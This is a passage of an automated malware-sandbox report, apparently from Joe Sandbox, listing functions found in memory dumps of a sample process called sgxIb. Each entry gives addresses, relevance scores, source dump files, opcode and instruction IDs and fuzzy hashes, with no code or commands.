                                                    • Opcode Fuzzy Hash: 569290dcdcee4791c8e76d0a644f6ce4d612307021f737fea912812feb44a3c7
                                                    • Instruction Fuzzy Hash: B031B530B001045BEB64AFADCD91BABBAE6FB88710F208925E159EB3C5DA719C419790
                                                    Function 06542A91 Relevance: .1, Instructions: 102COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1930198178.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_6540000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1900b243391080fa16ad3d29472fb1b9f7b9186cd1a03a0e9c79d795a27b6b39
                                                    • Instruction ID: 926ebdfd9b063d6a18907edff794edc7d776c863d54d1e3f3c215a7dec437d89
                                                    • Opcode Fuzzy Hash: 1900b243391080fa16ad3d29472fb1b9f7b9186cd1a03a0e9c79d795a27b6b39
                                                    • Instruction Fuzzy Hash: 3E415B34A106058FCB54EF69C598AAABBF1FF88714F144599E802DB364DB70ED45CF90
                                                    Function 0656DA98 Relevance: .1, Instructions: 101COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1930230813.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_6560000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f1c66d63053a7f546f4fd909c895f93019abbdb6989dac1e82c3426d08189289
                                                    • Instruction ID: c9e28422544b8fa8932071b0c28e25be863efbc357d7ec6f57d1ce3b64027213
                                                    • Opcode Fuzzy Hash: f1c66d63053a7f546f4fd909c895f93019abbdb6989dac1e82c3426d08189289
                                                    • Instruction Fuzzy Hash: 48317030E1070A9FCF25DF69C48069EBBB2FF85300F148A29E805AB254DB70A946CF80
                                                    Function 06562080 Relevance: .1, Instructions: 98COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1930230813.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_6560000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 869cd2a5c75aac3efe201e854e4a89e957b8ae7d4882cca9696f5cb5630abeb3
                                                    • Instruction ID: bf7d8f097944091af31f67ba045156907152249cbb9b630bb80e940c8feb438e
                                                    • Opcode Fuzzy Hash: 869cd2a5c75aac3efe201e854e4a89e957b8ae7d4882cca9696f5cb5630abeb3
                                                    • Instruction Fuzzy Hash: 06317E30E046059FCB56DFA5D89469EB7F2FF8A300F108529E906EB740DB71AD46CB51
                                                    Function 06542AA0 Relevance: .1, Instructions: 98COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1930198178.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_6540000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d39757473e82d7ce2842294b87cdae4dcfc38aa1fe1aaf784f578a502cb76df8
                                                    • Instruction ID: 9588fede428333e0fa14bd411137e3b38d8dd474d9fa639c3f9430b85ad91165
                                                    • Opcode Fuzzy Hash: d39757473e82d7ce2842294b87cdae4dcfc38aa1fe1aaf784f578a502cb76df8
                                                    • Instruction Fuzzy Hash: D5416B34A006088FCB54EF69C584AAABBF2FF48714F1085A9E806DB364DB70ED44CF90
                                                    Function 06562090 Relevance: .1, Instructions: 91COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1930230813.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_6560000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b4ddd8bfef0a736005b2cd6a496acaba021cd76e4c6a6cbe2caede33cd5caedf
                                                    • Instruction ID: c8a1d3819a424070aa46ce8733b41127c55ed8fadf6f218139c5e0fed5dec325
                                                    • Opcode Fuzzy Hash: b4ddd8bfef0a736005b2cd6a496acaba021cd76e4c6a6cbe2caede33cd5caedf
                                                    • Instruction Fuzzy Hash: 26318030E046059FCB55DF65D85469EB7F2BF8A300F108529E906EB344DB71ED46CB51
                                                    Function 06563508 Relevance: .1, Instructions: 86COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1930230813.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_6560000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9bd9e69970982d62078fbfe7b1d493597962366e150a0c12c69074aabfb189f8
                                                    • Instruction ID: 5ed8f76d5f2389e8322686de1874ad6dd903b480bb59ecb403373c5eb4f924f3
                                                    • Opcode Fuzzy Hash: 9bd9e69970982d62078fbfe7b1d493597962366e150a0c12c69074aabfb189f8
                                                    • Instruction Fuzzy Hash: C721D1719052A85FCB52DF79CC604DABFB5EF8A214F0444A7E086DB252DA30D989CBA1
                                                    Function 06563FC1 Relevance: .1, Instructions: 81COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1930230813.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_6560000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7f4e9c0a3b0112ae4d27aaf394cc8de1e830a1a366ac2a9112c38b2e1f52662c
                                                    • Instruction ID: 5984f504ac133f7e8439e3d192d3a98f3ca4afa2e8a1ef5ed00348737c786119
                                                    • Opcode Fuzzy Hash: 7f4e9c0a3b0112ae4d27aaf394cc8de1e830a1a366ac2a9112c38b2e1f52662c
                                                    • Instruction Fuzzy Hash: 00215775E102159FDB50DFA9D980AAEBBF6FB48710F008029E949EB384E735D902CF91
                                                    Function 06540AB8 Relevance: .1, Instructions: 80COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1930198178.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_6540000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8b71e8ec7acb7ecd4e2b1e44e678cb670e716d5a854244e1ad34d62d1e8f908d
                                                    • Instruction ID: 724db36521bfce6822afcf0beb956ca741bae1b04452bf682c225e581ae039b0
                                                    • Opcode Fuzzy Hash: 8b71e8ec7acb7ecd4e2b1e44e678cb670e716d5a854244e1ad34d62d1e8f908d
                                                    • Instruction Fuzzy Hash: 87213632B081541FCB467FB998245AF7FA7EFC5260B20446AE60ACB396DE318D1583E5
                                                    Function 06563FD0 Relevance: .1, Instructions: 78COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1930230813.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_6560000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7c32a08cfc188931d23ef3043ee7d01bc37a6bd4c41d8f9933a6361da6add847
                                                    • Instruction ID: 7679ccf1c486c8ae1c7d2579d72c6bc64bf6ed21f4bce3ff220273f043f69ab8
                                                    • Opcode Fuzzy Hash: 7c32a08cfc188931d23ef3043ee7d01bc37a6bd4c41d8f9933a6361da6add847
                                                    • Instruction Fuzzy Hash: 8E216975E102159FDB50DFAAD980AAEBBF6FB48710F108029E905EB384E735DD02CB91
                                                    Function 0656B038 Relevance: .1, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1930230813.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_6560000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0648eedbbae62d22be9c5b5a764433859cb19805118cf17c06bc568493bb81db
                                                    • Instruction ID: aa6f7428fb7fd7b8ca6ef4ae2a14ee70d49c047fc27c234ed5ffcf373b61736c
                                                    • Opcode Fuzzy Hash: 0648eedbbae62d22be9c5b5a764433859cb19805118cf17c06bc568493bb81db
                                                    • Instruction Fuzzy Hash: D9215E71E1075D8BDF64CFAAC84069EBBB5FF85310F10492AE805EB240EB719855CF81
                                                    Function 065405DD Relevance: .1, Instructions: 68COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1930198178.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_6540000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f149906b6034e9738d6f35d0b02c4c00dfd1c624f866f64d72f05d3818781f3c
                                                    • Instruction ID: 7382d4615511d059eff7f14581f74ed634fd102f4fb78048af06c0f4e633fae0
                                                    • Opcode Fuzzy Hash: f149906b6034e9738d6f35d0b02c4c00dfd1c624f866f64d72f05d3818781f3c
                                                    • Instruction Fuzzy Hash: B821F5B1D012189FCB50DF99D584ADEBBF4FB48314F1481AAE908AB255D374A944CFA4
                                                    Function 065405E0 Relevance: .1, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1930198178.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_6540000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6b3e9cec6f2c97b860f67e8d1c6898485da6b0764084681ea50b543f64367b70
                                                    • Instruction ID: 0d35ddf2045236e8ec8f63b4e8d6b1b6678bb4b283b652fa4324e145f0a01470
                                                    • Opcode Fuzzy Hash: 6b3e9cec6f2c97b860f67e8d1c6898485da6b0764084681ea50b543f64367b70
                                                    • Instruction Fuzzy Hash: E321E4B1D012189FCB50DF99D584BDEBBF4FB48324F14816AE908AB255D3749984CFA4
                                                    Function 06564318 Relevance: .1, Instructions: 61COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1930230813.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_6560000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fba500d18c4413c2f4f51f419160497811a565b1b355f519657ed40718bb1da2
                                                    • Instruction ID: 30a263673b236f77e99dee4c1c4235d7071fe0d0bba22c0732a9d8fffb519334
                                                    • Opcode Fuzzy Hash: fba500d18c4413c2f4f51f419160497811a565b1b355f519657ed40718bb1da2
                                                    • Instruction Fuzzy Hash: F311DE34B101501BCB25966EE80076FBBEBEBCB714F14842AF54ECB351DA65CC8287E6
                                                    Function 065640E0 Relevance: .1, Instructions: 59COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1930230813.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_6560000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1b97d10d94eac21798f1a60672bc85373d183f9237f62858e3c53724d40cbfdb
                                                    • Instruction ID: 0c36f957c4b71ede15eb047fd90441762b29f5ad2f5b1d9bc2dfb340d57845ea
                                                    • Opcode Fuzzy Hash: 1b97d10d94eac21798f1a60672bc85373d183f9237f62858e3c53724d40cbfdb
                                                    • Instruction Fuzzy Hash: FA118E32B141295FDB549A69DC146AE73FAEBC8710F018439D50AEB340EE34DC028BD1
                                                    Function 0656F2B8 Relevance: .1, Instructions: 58COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1930230813.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_6560000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 93ad8559b2115cba1d5f08f9769d9849abe00cd6ff5ab63ad91f71600fa31f6d
                                                    • Instruction ID: 8e109ab41b7d6fcde2c3f1b16437cec0bc9501053a89039fa5b10e1647c015b2
                                                    • Opcode Fuzzy Hash: 93ad8559b2115cba1d5f08f9769d9849abe00cd6ff5ab63ad91f71600fa31f6d
                                                    • Instruction Fuzzy Hash: FF01F531F081901FCB62C67EA8547AE6BD6EBCA314F18846AF449CB341DA11CC038B92
                                                    Function 06540D62 Relevance: .1, Instructions: 57COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1930198178.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_6540000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f55ac49d75ce4d60fbf514a85d9ff9d1123ae14d2ab3d1dbbf457a64522f1b81
                                                    • Instruction ID: 13b41012b5dc00cafebb9545150f4d7c31c64bae58d3f7e449f8227e8ab9dbe6
                                                    • Opcode Fuzzy Hash: f55ac49d75ce4d60fbf514a85d9ff9d1123ae14d2ab3d1dbbf457a64522f1b81
                                                    • Instruction Fuzzy Hash: 2E1156B28002499FCB10DF9AD845BDEBFF4EB48324F148419EA18A7250C339A594DFA5
                                                    Function 06563D9A Relevance: .1, Instructions: 56COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1930230813.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_6560000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 908de8ac90e8fdf28272d2f77d9e4cc3bcaaf498db6240588458fc4d4b1a9c55
                                                    • Instruction ID: acdcdc7cbeb80cd2b3a4e90d2bbca4b07fb33e1608c17241b750a8aa1abd6f68
                                                    • Opcode Fuzzy Hash: 908de8ac90e8fdf28272d2f77d9e4cc3bcaaf498db6240588458fc4d4b1a9c55
                                                    • Instruction Fuzzy Hash: 1E21C2B5D01259EFCB10DF9AD984ADEFFB4FB48320F10812AE918A7200D374A954CFA5
                                                    Function 0656A420 Relevance: .1, Instructions: 55COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1930230813.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_6560000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 529e0920e6a2eb51b638846b3a2d38729bbad1afc8eb4929a6dea01472c15de2
                                                    • Instruction ID: 2b469ad7ff80655bfbb8759a89eddb88cc69932773f0225bd52f5c9dcb02ff6f
                                                    • Opcode Fuzzy Hash: 529e0920e6a2eb51b638846b3a2d38729bbad1afc8eb4929a6dea01472c15de2
                                                    • Instruction Fuzzy Hash: FA01B130B001101FCB65D629E85476E77D6EB8A715F10843AF94ADB355DE61DD02CBD1
                                                    Function 065640D1 Relevance: .1, Instructions: 55COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1930230813.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_6560000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 20036d10a593ff3831434c8dc1b3446d0e102df59f7f8ff94d54176b80fb9fb2
                                                    • Instruction ID: 6f3a55e0b3973d1d8239eb140b892fb5a0591ca78430bc65bc2e724fb39a87dd
                                                    • Opcode Fuzzy Hash: 20036d10a593ff3831434c8dc1b3446d0e102df59f7f8ff94d54176b80fb9fb2
                                                    • Instruction Fuzzy Hash: C101B131B101195BDB989669DC106EF77EFEBC8710F40853AE50AD7384EE209C0387E2
                                                    Function 06540550 Relevance: .1, Instructions: 55COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1930198178.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_6540000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dcadd657c843aa5f5f9bdc37290c2f9c13afea98709396ed7e167429a0687146
                                                    • Instruction ID: 6bf52a2e40e4e55baabd4542872ec21b9ad4c6030438069db107a2d9ef643f67
                                                    • Opcode Fuzzy Hash: dcadd657c843aa5f5f9bdc37290c2f9c13afea98709396ed7e167429a0687146
                                                    • Instruction Fuzzy Hash: 411126B2800249DFDB10DF99C944BEEBFF4EB48324F148459EA18A7250C339A554DFA5
                                                    Function 06563DA0 Relevance: .1, Instructions: 52COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1930230813.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_6560000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 086846dfa7e0558db077f038250b735e18efb1e1a652a34ffe12d5735b937780
                                                    • Instruction ID: f99fa6809ed88422a65a4dd5c6028e3b0150f2ed438e71809311c15402d5c5cb
                                                    • Opcode Fuzzy Hash: 086846dfa7e0558db077f038250b735e18efb1e1a652a34ffe12d5735b937780
                                                    • Instruction Fuzzy Hash: 8811D0B1D01259AFCB10DF9AD884ACEFFB4FB48320F10812AE918B7200C374A954CFA5
                                                    Function 06564328 Relevance: .1, Instructions: 51COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1930230813.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_6560000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8f7ef176bd2f95a3035180006ce75d8fb6347b212f858ee0ae621ccf9a1d324c
                                                    • Instruction ID: e59261c20b578e674c2d9722a7b79a01fe5eba7c01df6407e98bc9bcf200286e
                                                    • Opcode Fuzzy Hash: 8f7ef176bd2f95a3035180006ce75d8fb6347b212f858ee0ae621ccf9a1d324c
                                                    • Instruction Fuzzy Hash: 1A018C31B101101BDB64956EA45076FA3DBEBCA714F24C43AF90EC7354DE62DC828795
                                                    Function 0656F2C8 Relevance: .0, Instructions: 49COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1930230813.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_6560000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 58cb6dc3a0b3a866347168c2e87c0fe070646149769a3c029301a2992f23451c
                                                    • Instruction ID: 5925f13047afa2ad0c1d05e82f930bc08c36619c3411d6fd4de58195b38a5c1c
                                                    • Opcode Fuzzy Hash: 58cb6dc3a0b3a866347168c2e87c0fe070646149769a3c029301a2992f23451c
                                                    • Instruction Fuzzy Hash: 31018C35F040101BCB65D67EA85072F62DBEBCA724F148839F50ACB340DE61DC028B86
                                                    Function 0654033A Relevance: .0, Instructions: 49COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1930198178.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_6540000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ef95c21f96152c63a55a64fd688595d2cd04c09970a665f12e3a96c9c0eb2887
                                                    • Instruction ID: 2d802883ab17d767d081cb3e4eb53da28dee6990ca28bf79d0a091b5824875d9
                                                    • Opcode Fuzzy Hash: ef95c21f96152c63a55a64fd688595d2cd04c09970a665f12e3a96c9c0eb2887
                                                    • Instruction Fuzzy Hash: B5F04975E112495BCBA0EB79AC00BDF7FB8FB85255F1048B6E609E7140E261C9408BE1
                                                    Function 0656A430 Relevance: .0, Instructions: 46COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1930230813.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_6560000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 82fc02d7101aabecd2368f30a576a649abb37a75a6753807c1d70a7158e560be
                                                    • Instruction ID: 5ce2d7dc4093aeb32aa60a31f2a9db9090f6db508e92a62d0ab5395a6ffb39c6
                                                    • Opcode Fuzzy Hash: 82fc02d7101aabecd2368f30a576a649abb37a75a6753807c1d70a7158e560be
                                                    • Instruction Fuzzy Hash: 33018130B001104FCB64E669E85471E73D6EB89719F104439F54AD7344DE61DC028BC1
                                                    Function 0654026D Relevance: .0, Instructions: 39COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1930198178.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_6540000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5a4a1dae64322f8a09e02749789326255ee51826331993370435febd1615c2a5
                                                    • Instruction ID: f7736d377b61d29db9b5663a7673b5db827f97c4cc8f3f11f00a3aa611109d6a
                                                    • Opcode Fuzzy Hash: 5a4a1dae64322f8a09e02749789326255ee51826331993370435febd1615c2a5
                                                    • Instruction Fuzzy Hash: BFF08C35B011188FDB10DBA8DC40BEEB7F2FB88322F1485A5E619A72D5C734D9118BA0
                                                    Function 06540B28 Relevance: .0, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1930198178.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_6540000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6e494a36f4e336419e874bec5f47fcf5c15890261c89f0e0821f2931389ad2b8
                                                    • Instruction ID: 8a0b21d946e1ac7fc16d8d48a1bbc2156cc29106580aafe730f1b69c996253c8
                                                    • Opcode Fuzzy Hash: 6e494a36f4e336419e874bec5f47fcf5c15890261c89f0e0821f2931389ad2b8
                                                    • Instruction Fuzzy Hash: 8BF082327001196F8B45AE999C549AF7BABEBC8360B00442AFA09D7250DB31891597A5
                                                    Function 06566588 Relevance: .0, Instructions: 27COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1930230813.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_6560000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8ccd123f95641deb1f3fcca12a563492d2aab5188b509fa58495642430600488
                                                    • Instruction ID: a745fc9452afe63f92c5e4594369fba18d2c2dc86f43b0f7eeed67917466c87d
                                                    • Opcode Fuzzy Hash: 8ccd123f95641deb1f3fcca12a563492d2aab5188b509fa58495642430600488
                                                    • Instruction Fuzzy Hash: E9E02270E082486FCF21CE71890679A3BA8A703204F5080A6E804DB207E176C901CB82
                                                    Function 06540348 Relevance: .0, Instructions: 25COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1930198178.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_6540000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0a2c71f92cdd894839e010fa63b17f5e8c8a6a99fbea4841a887b1240b97f939
                                                    • Instruction ID: c1f843067bb81848c6e295f29436bbac0aaa2c9d363739a4e1bdb95078db52af
                                                    • Opcode Fuzzy Hash: 0a2c71f92cdd894839e010fa63b17f5e8c8a6a99fbea4841a887b1240b97f939
                                                    • Instruction Fuzzy Hash: 48E04871D002159F8B90EF795D0079E7BF9FB45254F1084B5DA09E3240F670C6008BD1
                                                    Function 06542A2B Relevance: .0, Instructions: 23COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1930198178.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_6540000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 54ed87d59123ebf5195e499f596a00c6764312b4603613df2c97e39bd6ec8ef4
                                                    • Instruction ID: 3be637e80995a75285fc3f23ffb32d9b36a8ef29b4f0ef33949dfaa015dc9062
                                                    • Opcode Fuzzy Hash: 54ed87d59123ebf5195e499f596a00c6764312b4603613df2c97e39bd6ec8ef4
                                                    • Instruction Fuzzy Hash: EEE0C235F040309B0E607268A4A15BD7382FBC8269B0041EAFA05DB20ADF618A4347C1

                                                    Non-executed Functions

                                                    Function 065677B8 Relevance: 13.0, Strings: 10, Instructions: 468COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1930230813.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_6560000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                    • API String ID: 0-2222239885
                                                    • Opcode ID: c32fef27a0e2bc6404872073254837b7282e051f07688a6c82d3a3adab7630e5
                                                    • Instruction ID: fc43f80b1362fa530108f1415fdbb589355fe0def6059dd5138a090b7ba70501
                                                    • Opcode Fuzzy Hash: c32fef27a0e2bc6404872073254837b7282e051f07688a6c82d3a3adab7630e5
                                                    • Instruction Fuzzy Hash: A112FF30E002198FDB64DF75D954AADB7F2BF89704F208969E409AB365DB309D86CF81
                                                    Function 0656AA50 Relevance: 10.2, Strings: 8, Instructions: 229COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1930230813.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_6560000_sgxIb.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                    • API String ID: 0-3823777903
                                                    • Opcode ID: 1c080567116adde70ace84e22f94a5a747f51b6f1379e5a52743d8b5195fc6dd
                                                    • Instruction ID: 1ca8defb57b6fdf3da8c7aa8501020145ce85672fb412cedd9702c7a004abdac
                                                    • Opcode Fuzzy Hash: 1c080567116adde70ace84e22f94a5a747f51b6f1379e5a52743d8b5195fc6dd
